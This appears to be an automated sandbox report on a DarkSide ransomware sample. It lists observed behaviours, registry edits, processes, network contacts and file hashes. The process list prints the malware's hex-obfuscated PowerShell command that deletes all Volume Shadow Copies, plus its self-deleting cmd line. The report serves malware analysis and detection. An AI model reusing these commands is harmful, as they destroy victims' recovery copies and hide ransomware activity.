Analysis Overview
SHA256
2b2aff0f96023927c709a40c979612bbf123ec59478d7f91a06d25e55f98460b
Threat Level: Known bad
The file darkside.zip was found to be: Known bad.
Malicious Activity Summary
DarkSide
Credentials from Password Stores: Credentials from Web Browsers
Renames multiple (134) files with added filename extension
Reads user/profile data of web browsers
Credentials from Password Stores: Windows Credential Manager
Indicator Removal: File Deletion
Command and Scripting Interpreter: PowerShell
Suspicious use of NtSetInformationThreadHideFromDebugger
Sets desktop wallpaper using registry
System Location Discovery: System Language Discovery
Unsigned PE
Enumerates physical storage devices
Browser Information Discovery
Uses Volume Shadow Copy service COM API
Suspicious behavior: EnumeratesProcesses
Modifies Control Panel
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Opens file in notepad (likely ransom note)
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-06 10:27
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-06 10:27
Reported
2024-08-06 10:29
Platform
win11-20240802-en
Max time kernel
117s
Max time network
95s
Command Line
Signatures
DarkSide
Credentials from Password Stores: Credentials from Web Browsers
Renames multiple (134) files with added filename extension
Credentials from Password Stores: Windows Credential Manager
Reads user/profile data of web browsers
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Indicator Removal: File Deletion
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-970747758-134341002-3585657277-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\80caa7ac.BMP" | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-970747758-134341002-3585657277-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\80caa7ac.BMP" | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-970747758-134341002-3585657277-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.80caa7ac | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.80caa7ac\ = "80caa7ac" | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\80caa7ac\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\80caa7ac | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\80caa7ac\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\80caa7ac.ico" | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-970747758-134341002-3585657277-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2432 wrote to memory of 1932 | N/A | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2432 wrote to memory of 1932 | N/A | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2432 wrote to memory of 5288 | N/A | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2432 wrote to memory of 5288 | N/A | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2432 wrote to memory of 5288 | N/A | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | C:\Windows\SysWOW64\cmd.exe |
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Darkside.exe
"C:\Users\Admin\AppData\Local\Temp\Darkside.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\Darkside.exe >> NUL
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\README.80caa7ac.TXT
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | securebestapp20.com | udp |
| US | 172.234.222.143:443 | securebestapp20.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.18.2.in-addr.arpa | udp |
| GB | 104.86.110.121:443 | tcp | |
| GB | 104.86.110.121:443 | tcp | |
| GB | 95.101.129.209:443 | r.bing.com | tcp |
| GB | 95.101.129.209:443 | r.bing.com | tcp |
| GB | 95.101.129.209:443 | r.bing.com | tcp |
| GB | 95.101.129.209:443 | r.bing.com | tcp |
| GB | 95.101.129.209:443 | r.bing.com | tcp |
| US | 172.234.222.138:443 | securebestapp20.com | tcp |
| US | 8.8.8.8:53 | 51.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 247.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.0.127.10.in-addr.arpa | udp |
| US | 172.234.222.138:443 | securebestapp20.com | tcp |
| US | 8.8.8.8:53 | 229.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 247.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.0.127.10.in-addr.arpa | udp |
Files
memory/1932-1-0x00007FF8C2C43000-0x00007FF8C2C45000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v5dno0bf.rld.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1932-10-0x000001AE6F000000-0x000001AE6F022000-memory.dmp
memory/1932-11-0x00007FF8C2C40000-0x00007FF8C3702000-memory.dmp
memory/1932-12-0x00007FF8C2C40000-0x00007FF8C3702000-memory.dmp
memory/1932-13-0x00007FF8C2C40000-0x00007FF8C3702000-memory.dmp
memory/1932-16-0x00007FF8C2C40000-0x00007FF8C3702000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | aa0a32b11dca7b04f4cc5fe8c55cb357 |
| SHA1 | 00e354fd0754a7d721a270cdc08f970b9a3f6605 |
| SHA256 | e336a593bd31921c46757a88a99759f6a33854d0c8b854c0c8f118e5cede1ea1 |
| SHA512 | 1db91d3540da2c7eb4e151d698f3a9c1d2caed3161c41f1c2c73781a65e9dfc818902f0220c0aa9fc2c617d4851f23f4a576c4e5fe0f40ec78e9ed01c8ad8b30 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8f16eb240c6168b41004cca7306484e6 |
| SHA1 | da34df40f9b1d5b0f9fd49bd1d467879fb40cb06 |
| SHA256 | 48c69824555f42932cc2a1272a03be650dde58a10239ba282e9314ec13ed273a |
| SHA512 | 96c4a859b024e531124139c28bebd4d6f53de3ae7bc378ea3c7662452525d4020d1a76f851651174418cae620c340e8677516a3a70933b2ff2cce6a71a349063 |
C:\Users\Admin\README.80caa7ac.TXT
| MD5 | b58e2411168bbdbec635cf4001635db0 |
| SHA1 | c130cd9caaaa514a6b98c1168e10d44a989d191a |
| SHA256 | 652a74736e10402013fae584c967fc5ea3b7c2eac0a436d41759963b3d42e37a |
| SHA512 | 87e2c3ecf3805a7b3945eed4472548a63cbaee7c004c3bce220524e1c6733b3eb780812b4d336f6b72a365c161c02e18b8101e405d00507ff902e88dd49ba30a |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
| MD5 | cd6829f53a60318a54648f4ff9d694c2 |
| SHA1 | eda672c23f219a9cdbe740079412f5fbe04a157d |
| SHA256 | 5410184dfd5ef071de14c78cc7e9488049a85e313a3454250d53e974251ac906 |
| SHA512 | 25a54ac013419868211b704a9b1f4cbc7c0a5b1a0e10cec09cd8eee3fbde7497e36c8e35f0506622eb9a47939c2c6b9590bf9bbf8d43508be13d7f85f7838ec9 |